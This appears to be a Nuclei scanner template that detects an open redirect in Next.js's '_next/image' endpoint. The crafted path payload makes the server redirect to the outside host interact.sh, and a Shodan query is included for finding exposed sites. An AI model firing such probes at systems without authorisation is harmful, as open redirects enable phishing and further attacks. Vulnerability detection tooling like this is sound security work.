28 lines
606 B
YAML
28 lines
606 B
YAML
id: nextjs-redirect
|
|
|
|
info:
|
|
name: Next.js Open Redirect on “_next/image” via Improper Path Parsing
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
reference:
|
|
- https://samcurry.net/universal-xss-on-netlifys-next-js-library/
|
|
metadata:
|
|
shodan-query: html:"/_next/static"
|
|
tags: redirect,nextjs
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/_next/image?url=/\/\interact.sh/&q=100&w=128&h=128'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'Location: /\/\/interact.sh'
|
|
|
|
- type: status
|
|
status:
|
|
- 308
|